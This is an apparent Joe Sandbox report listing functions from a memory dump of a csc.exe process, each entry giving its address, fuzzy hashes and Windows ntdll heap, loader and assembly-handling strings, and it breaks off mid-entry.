Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: fc6cd22fd26aba5865b7f5776c1c48bc3ecafebb9c7d1e2bfa4d1e83daaca1ca
Instruction ID: 47b2ecd78a80c55b88553de685a194c474d371e0c527ea35b32b6844559863fd
Opcode Fuzzy Hash: fc6cd22fd26aba5865b7f5776c1c48bc3ecafebb9c7d1e2bfa4d1e83daaca1ca
Instruction Fuzzy Hash: B6911531A14780DFCB21DF68E445EADBFF2FF89714F184019E856AB2A1CB35A985CB14

Function 0595645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim user exports failed with status 0x%08lx, xrefs: 059B9A01
Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 059B99ED
Loading the shim user DLL failed with status 0x%08lx, xrefs: 059B9A2A
minkernel\ntdll\ldrinit.c, xrefs: 059B9A11, 059B9A3A
LdrpInitShimEngine, xrefs: 059B99F4, 059B9A07, 059B9A30
apphelp.dll, xrefs: 05956496

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 14e54f8272c84b936eb76412db606e1e2642677252248ef8b2613ce1e4309beb
Instruction ID: cfe3979d478adde99fd9d8851385dc8cb4803002fe827d9b6b561dcb4fc48b44
Opcode Fuzzy Hash: 14e54f8272c84b936eb76412db606e1e2642677252248ef8b2613ce1e4309beb
Instruction Fuzzy Hash: E751C2712683049FE720DF24C946FABBBE9FFC4654F40491AF9869B190DA70E905CB92

Function 0599C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 0599C6C4
minkernel\ntdll\ldrredirect.c, xrefs: 059D8181, 059D81F5
Loading import redirection DLL: '%wZ', xrefs: 059D8170
Unable to build import redirection Table, Status = 0x%x, xrefs: 059D81E5
minkernel\ntdll\ldrinit.c, xrefs: 0599C6C3
LdrpInitializeImportRedirection, xrefs: 059D8177, 059D81EB

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 4f73b14f53370301f7c7ea0350f8eb17569802b270c2a6e046f62cf094ed817b
Instruction ID: 9dfacdfdc46de87d3a1b3508fd6fd092f4b6bc0cbfd8c0fa5f328986ab3ed615
Opcode Fuzzy Hash: 4f73b14f53370301f7c7ea0350f8eb17569802b270c2a6e046f62cf094ed817b
Instruction Fuzzy Hash: 793105B17483469BC614EF28DD4AE2AB7A5FFC4B50F044958F8456B291EA20FD05CBA2

Function 05992674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

RtlGetAssemblyStorageRoot, xrefs: 059D2160, 059D219A, 059D21BA
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 059D2180
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 059D219F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 059D21BF
SXS: %s() passed the empty activation context, xrefs: 059D2165
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 059D2178

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 8e78cffdaa4354a71f63a35f4b663eadb87a85586bf9e9ab257d19147fc8130d
Instruction ID: d21689337b7939e861cbe0c39c12e4fb084aaefc6f37a2266124510a5a10139f
Opcode Fuzzy Hash: 8e78cffdaa4354a71f63a35f4b663eadb87a85586bf9e9ab257d19147fc8130d
Instruction Fuzzy Hash: 8231083EB402197BEF25CB998C85F6EB769EBD5A40F058055FA057B240E270AE01D6B1

Function 0598F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 059D031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 059D02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 059D02E7

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: c90cfecee61c6e81f0a38424264dfa88757570d9c4f7516e07c949bcd51a7125
Instruction ID: b45df1a6ca5a19e04b33b891c45a81fcb9f00460368da8e9d374327e575b9e54
Opcode Fuzzy Hash: c90cfecee61c6e81f0a38424264dfa88757570d9c4f7516e07c949bcd51a7125
Instruction Fuzzy Hash: 00E1CF316087419FD725DF28C888B2AB7E5FF88324F144A1DF5A68B2D0E774E945CB62

Function 059851EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 0598522A
Kernel-MUI-Language-Allowed, xrefs: 0598527B
Kernel-MUI-Language-Disallowed, xrefs: 05985352
Kernel-MUI-Number-Allowed, xrefs: 05985247
Kernel-MUI-Language-SKU, xrefs: 0598542B

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 078f56c9cbff4dd02990d277744e682d419fb27dc33f5d33aca218406d4cf8ea
Instruction ID: 0b7ae8cf7543976c7f52ee6079f2256a36add6eb62762025ed408033cef9eb23
Opcode Fuzzy Hash: 078f56c9cbff4dd02990d277744e682d419fb27dc33f5d33aca218406d4cf8ea
Instruction Fuzzy Hash: B3F13B72E10218EFCB11EFA8C9859EEBBBDFF48650F56445AE401E7210D674AE05CBA0

Function 0598D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

Process 0x%p (%wZ) exiting, xrefs: 059CF2C7
$, xrefs: 0598D900
LdrShutdownProcess, xrefs: 059CF2CE
minkernel\ntdll\ldrinit.c, xrefs: 059CF2D8
$, xrefs: 0598D86D

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-1975516107
Opcode ID: 2c8beade664cb4789a9e1858d1d11974e87c22a6237645f29878bf79e9fdd2c8
Instruction ID: b9140bf228349bf4a242342bb56db68b090b3a27652dd5c44c5242f038dd6b26
Opcode Fuzzy Hash: 2c8beade664cb4789a9e1858d1d11974e87c22a6237645f29878bf79e9fdd2c8
Instruction Fuzzy Hash: 2F51D172E04349DFDB14EFA4D489BADBFB2BF88314F144159E4026B281DB75A945CB90

Function 059576B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

RtlFreeHeap, xrefs: 059BB03F
Invalid heap signature for heap at %p, xrefs: 059BB02F
HEAP[%wZ]: , xrefs: 059BB016
, passed to %s, xrefs: 059BB040
HEAP: , xrefs: 059BB023

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: cd05e2f91c576cf52c4a5c8251ede37b187417b7cf82f8f3cfa3782aed1e2226
Instruction ID: b33ca33076802180cec50763d1e2e2c2d756e40c78767dbbfe07f1379b8dcdb5
Opcode Fuzzy Hash: cd05e2f91c576cf52c4a5c8251ede37b187417b7cf82f8f3cfa3782aed1e2226
Instruction Fuzzy Hash: D701D833215240DFF325D769951FFAABBD9EB86B34F194059E40247591CAE4A884D260

Function 059770C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05977C96, 05978696
HEAP[%wZ]: , xrefs: 05977C6D, 05978670
HEAP: , xrefs: 05977C7C, 0597867F

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 1c98e1e9d1e78dbc4079acade96f3f1ac5c9fdbfe8c7d0aeea8ced437fefde6f
Instruction ID: 359379568c498cf7521400dcd93dc2550fadb8192d37212f4837f0c6d3a3cff5
Opcode Fuzzy Hash: 1c98e1e9d1e78dbc4079acade96f3f1ac5c9fdbfe8c7d0aeea8ced437fefde6f
Instruction Fuzzy Hash: D213C070A04659DFDB24CF68C494BB9BBF6FF49304F1485AAD84AAB381D734A941CF90

Function 05971070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 059C588F
@, xrefs: 059C5A53
HEAP[%wZ]: , xrefs: 059C5877
HEAP: , xrefs: 059C5884

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 2994545307-3570731704
Opcode ID: ac04f688896860fec07ff559efd459cfb32cdbaf0572cf338014ab2f32246bf3
Instruction ID: 2aa44ee31e67f5940313d973e6548410fb68bc9b2a1f97efb079be464a2bda68
Opcode Fuzzy Hash: ac04f688896860fec07ff559efd459cfb32cdbaf0572cf338014ab2f32246bf3
Instruction Fuzzy Hash: D7925A71A04228CFEB24CF18CC45FA9B7BABF45354F0585EAE949AB250D734AE80CF51

Function 05998402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 05998422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0599855E
minkernel\ntdll\ldrinit.c, xrefs: 05998421
@, xrefs: 05998591

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 7637d42674e36f65ce20602ad02886572aec2acb7d95d90a957a352ea7aee1f1
Instruction ID: 2126a79e28ad92cc35e51d0b5d487a8c5ef4a79da051625e8174c9b972df606b
Opcode Fuzzy Hash: 7637d42674e36f65ce20602ad02886572aec2acb7d95d90a957a352ea7aee1f1
Instruction Fuzzy Hash: C2917B72618344AFDB21DF64CC55EABBBECBF85744F40492EFA8496150E730E908DB62

Function 0599273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 059D22B6
.Local, xrefs: 059928D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 059D21D9, 059D22B1
SXS: %s() passed the empty activation context, xrefs: 059D21DE

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: d0ec278f825c31c91acf9eac1abacfb957971e5c7b82b827b005235ce6c28efe
Instruction ID: 722df5df56687b2e43e850418c3a909283ce9f9fd716b24ca927f081acfe96ea
Opcode Fuzzy Hash: d0ec278f825c31c91acf9eac1abacfb957971e5c7b82b827b005235ce6c28efe
Instruction Fuzzy Hash: 98A1B63990422AEFCF28CF58DD84BA9B3B5BF58314F1545E9E909A7251D730AE81CF90

Function 059664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 059C1028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 059C106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 059C0FE5
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 059C10AE

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 5363c0a7c0b2aed0651883d8b8e9dea7615691d12ef19b8dbc0badc2f323d9d4
Instruction ID: 156c3590a4a2b6cda2a6d7de2ebb747e3013f07a5d80849ef3bcc12bdeb540b7
Opcode Fuzzy Hash: 5363c0a7c0b2aed0651883d8b8e9dea7615691d12ef19b8dbc0badc2f323d9d4
Instruction Fuzzy Hash: C571AEB1A043449FDB60DF14C889FAB7FADAF85764F000469F9498B246D774E588CBE2

Function 0595F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

`, xrefs: 059BE428
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 059BE563
HEAP[%wZ]: , xrefs: 059BE3FE
HEAP: , xrefs: 059BE54E

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 5bf46331b90aff7d79dca27794e79f0c3ef6bbdb62689446e4b2fb29f7d6b24e
Instruction ID: 6d3c58484ab2884e8ecff9d365d9301242e5f7bb70005119c1bea0781955a54f
Opcode Fuzzy Hash: 5bf46331b90aff7d79dca27794e79f0c3ef6bbdb62689446e4b2fb29f7d6b24e
Instruction Fuzzy Hash: 036104723056849FE721DB28C948FA777EEFF80724F040869F9558B291D774E944C762

Function 059815F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

MZER, xrefs: 059816E8
Could not validate the crypto signature for DLL %wZ, xrefs: 059CA589
LdrpCompleteMapModule, xrefs: 059CA590
minkernel\ntdll\ldrmap.c, xrefs: 059CA59A

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
API String ID: 0-1409021520
Opcode ID: 65f126626e2849990e656a1560ad97bc370eefc26ed95953dc3dc80b4b685d09
Instruction ID: d9ac4a78062e5b61ffc739caad45a8bef5abf4ab45335db13be46079a311b3ce
Opcode Fuzzy Hash: 65f126626e2849990e656a1560ad97bc370eefc26ed95953dc3dc80b4b685d09
Instruction Fuzzy Hash: 915156307047889BDB21EB28C948F7A7BE9FF40714F1849A9E9929B2E1D774E902D741

Function 05A111A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 05A11261
This is located in the %s field of the heap header., xrefs: 05A112D6
HEAP[%wZ]: , xrefs: 05A1123D, 05A112B7
HEAP: , xrefs: 05A1124A, 05A1125D, 05A1125F, 05A112C4

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: cc622b808aa401b2d9b2974d097b687236d0b7e3cbb2a50057d071440013c212
Instruction ID: c0cdfe67077dc58a36f6ee11329f28e99eb30506de81ce30f628b8cc6ededcfa
Opcode Fuzzy Hash: cc622b808aa401b2d9b2974d097b687236d0b7e3cbb2a50057d071440013c212
Instruction Fuzzy Hash: FE31E136204110EFD710DB98C889FAA77EAFF49764F140065FD12CF2A0E670AC41DB68

Function 0598245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 059CA998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 059CA992
minkernel\ntdll\ldrinit.c, xrefs: 059CA9A2
apphelp.dll, xrefs: 05982462

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 558a31a52c26827fbc6b68e05fbf903ae55cf4c8e7471b1403a1a7e41eb46e23
Instruction ID: b921dfcb5a22540d13f1d6313cfb76538dcdc41f3a82ece2dc961e69318c4d62
Opcode Fuzzy Hash: 558a31a52c26827fbc6b68e05fbf903ae55cf4c8e7471b1403a1a7e41eb46e23
Instruction Fuzzy Hash: 91312571A10305ABDB21DF68D84AE7EFFBAFBC4750F15049AF8016B250CB706882CB91

Function 05959148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualQuery Failed 0x%p %x, xrefs: 059BBAF7
VirtualProtect Failed 0x%p %x, xrefs: 059BBABA
HEAP[%wZ]: , xrefs: 059BBAA0, 059BBADD
HEAP: , xrefs: 059BBAAD, 059BBAEA

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: 609ad5aebda92103c93c9bcb713fbd8dc23698dd8bf3d2ece18a68e1767d2cdb
Instruction ID: bdab8d518781cb05ec95e9b1fe9f1e4f05ccbca6a19902f169eec8ee51ce7655
Opcode Fuzzy Hash: 609ad5aebda92103c93c9bcb713fbd8dc23698dd8bf3d2ece18a68e1767d2cdb
Instruction Fuzzy Hash: 6231AF72A00218EFEB11DB45C989FAEB7FAEF85734F154051E815AB290D7B0ED40CB60

Function 05A094E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

, xrefs: 05A09B84
, xrefs: 05A09AD7
0, xrefs: 05A09BF6

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: cf754b100a4a0171930d52183067ab459742a5b2695ecf5bd8a271dd2d70bf05
Instruction ID: 4f3014340e181b830ffeb86cc2cf487e1adaba0aeb07724c58f4b985af5dfefe
Opcode Fuzzy Hash: cf754b100a4a0171930d52183067ab459742a5b2695ecf5bd8a271dd2d70bf05
Instruction Fuzzy Hash: 093233B16183819FD360CF68D484B6BFBE5BB88344F04492EF5A987391D774E809CB52

Function 05970770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 059C50CA
HEAP[%wZ]: , xrefs: 059C50AE
HEAP: , xrefs: 059C50BD

Memory Dump Source

Source File: 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Offset: 05930000, based on PE: true

Associated: 00000006.00000002.2189080452.0000000005A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5930000_csc.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: c30cc08547a1edb854cb2d6da331fa936cf8393534d5af714e66438474654686
